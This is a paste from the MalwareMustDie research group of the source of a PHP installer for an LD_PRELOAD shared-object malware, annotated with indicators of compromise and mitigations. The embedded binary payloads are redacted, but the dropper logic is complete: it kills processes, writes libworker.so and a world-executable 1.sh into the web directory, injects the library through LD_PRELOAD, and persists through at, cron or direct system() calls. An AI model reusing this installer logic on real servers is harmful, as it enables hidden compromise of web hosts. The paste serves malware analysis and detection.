MalwareMustDie

jinxed source2 of .SO ELF LD_PRELOAD PHP malware installer

Jun 10th, 2014 (edited)
  1. // Sample jinxed source code of the .SO ELF LD_PRELOAD PHP malware installer
  2. // MalwareMustDie
  3.  
  4. <?php
  5.  
// Force a plain-text response so whoever requested this script sees the progress
// lines printed below as-is rather than as HTML.
header("Content-type: text/plain");
// Fixed marker printed before anything else. Presumably the requesting side checks
// for it to confirm the installer executed; the meaning of the number itself is
// not visible in this file. The literal is a usable string IoC in web-server
// response captures / proxy logs.
print "2842123700\n";
  8.  
// Compatibility shim: file_put_contents() is a built-in since PHP 5, so this only
// takes effect on very old interpreters. Returns false when the file cannot be
// opened for writing (the fopen() warning is suppressed with @), otherwise the
// fwrite() result (bytes written, or false). Used below to drop ./libworker.so
// and 1.sh.
if (! function_exists('file_put_contents')) {
    function file_put_contents($filename, $data) {
        $f = @fopen($filename, 'w');
        if (! $f)
            return false;
        $bytes = fwrite($f, $data);
        fclose($f);
        return $bytes;
    }
}
  19.  
// Kill any running "host" process (basename("/usr/bin/host") is simply "host") so
// a previously injected instance is gone before the payload file is replaced.
// Output and errors are suppressed. A web-server account invoking killall is a
// strong signal in process-audit / auditd logs.
@system("killall -9 ".basename("/usr/bin/host"));

// Embedded payloads, redacted ("jinxed") in this copy. In the live sample these
// hold the 32-bit and 64-bit builds of the shared object written to
// ./libworker.so below.
$so32 = "xxxxxxxxxx";
$so64 = "xxxxxxxxxx";
// Word-size probe: on 32-bit PHP, intval() of a value above PHP_INT_MAX saturates
// to 2147483647, so the comparison is true only on a 32-bit interpreter.
$arch = 64;
if (intval("9223372036854775807") == 2147483647)
    $arch = 32;
print "Arch is ".$arch."\n";
$so = $arch == 32 ? $so32 : $so64;
// Read the first 8 bytes of /usr/bin/host, i.e. the start of the ELF e_ident
// array. unpack("C*") returns a 1-indexed array, so $n[8] is file offset 7,
// the EI_OSABI byte.
$f = fopen("/usr/bin/host", "rb");
if ($f) {
    $n = unpack("C*", fread($f, 8));
    // Patch the same byte (offset 7) in the payload so the dropped library's
    // OSABI field matches the binary it will be preloaded into. 9 is
    // ELFOSABI_FREEBSD; the code treats every other value as Linux.
    $so[7] = sprintf("%c", $n[8]);
    print "System is ".($n[8] == 9 ? "FreeBSD" : "Linux")."\n";
    fclose($f);
}
// Drop the shared object into the current working directory (wherever this PHP
// file is executing — typically a web-writable path). Prints the byte count, or
// an empty string when the write failed (false concatenates as ""). File IoC:
// libworker.so sitting alongside web content.
print "SO dumped ".file_put_contents("./libworker.so", $so)."\n";
// Operator debug switch: with MAYHEM_DEBUG set in the environment the installer
// stops after dumping the .so and never schedules it. The variable name is a
// handy string IoC for this family.
if (getenv("MAYHEM_DEBUG"))
    exit(0);
// Where this installer was reached (server name + request path). It is passed to
// the payload through the AU environment variable in the script built below; the
// @ hides a notice if SERVER_NAME is unset. Presumably libworker.so reads AU to
// record which site it was installed through — not verifiable from this file.
// Because it is request-derived, the exact bytes of 1.sh vary per infection.
$AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
/* second stage dropper */
$HBN=basename("/usr/bin/host");
$SCP=getcwd();
// Shell script 1.sh, written next to the .so. Line by line it: changes into this
// directory; if ./libworker.so is present, kills "host", exports AU and
// LD_PRELOAD=./libworker.so, runs /usr/bin/host (which loads the dropped library
// into that process) and unsets LD_PRELOAD; then rewrites the user's crontab
// without any line containing 1.sh or crontab, and deletes itself.
// Note $HBN is interpolated by PHP inside the double-quoted string ("host"),
// while $SCP and $AU are concatenated in.
$SCR  ="#!/bin/sh\ncd '".$SCP."'\nif [ -f './libworker.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./libworker.so\n/usr/bin/host\nunset LD_PRELOAD\n";
$SCR .="crontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n";
// Write the script world-executable (0777), errors suppressed. Detection: 1.sh in
// a web-writable directory; a "host" process whose /proc/<pid>/environ carries
// LD_PRELOAD=./libworker.so and an AU variable.
@file_put_contents("1.sh", $SCR);
@chmod("1.sh", 0777);
/* try at now, file will be removed, crontab cleaned on success */
// Execution attempt 1: queue 1.sh through at(1). $ret receives system()'s exit
// status. Since 1.sh deletes itself as its last step, the file disappearing
// within 5 s is taken as proof that it ran.
@system("at now -f 1.sh", $ret);
if ($ret == 0) {
    for ($i = 0; $i < 5; $i++) {
        if (! @file_exists("1.sh")) {
            print "AT success\n";
            exit(0);
        }
        sleep(1);
    }
}
// Attempt 2: append an every-minute crontab entry for <cwd>/1.sh (existing lines
// containing "crontab" are filtered out first), then wait just over a minute for
// the same self-deletion signal. 1.sh removes this entry again once it has run,
// so the line may exist only briefly — check cron/syslog for the web-server
// account invoking "crontab" rather than relying on the live crontab alone.
@system("(crontab -l|grep -v crontab;echo;echo '* * * * * ".$SCP."/1.sh')|crontab", $ret);
if ($ret == 0) {
    for ($i = 0; $i < 62; $i++) {
        if (! @file_exists("1.sh")) {
            print "CRONTAB success\n";
            exit(0);
        }
        sleep(1);
    }
}
// Attempt 3: neither scheduler worked — run the script directly as the PHP/web
// user. Mitigations covering all three paths: php.ini disable_functions for
// system()/exec() and friends, a document root the web user cannot write to,
// and denying at/cron access to the web-server account.
print "Running straight\n";
@system("./1.sh");
  70.  
  71. ?>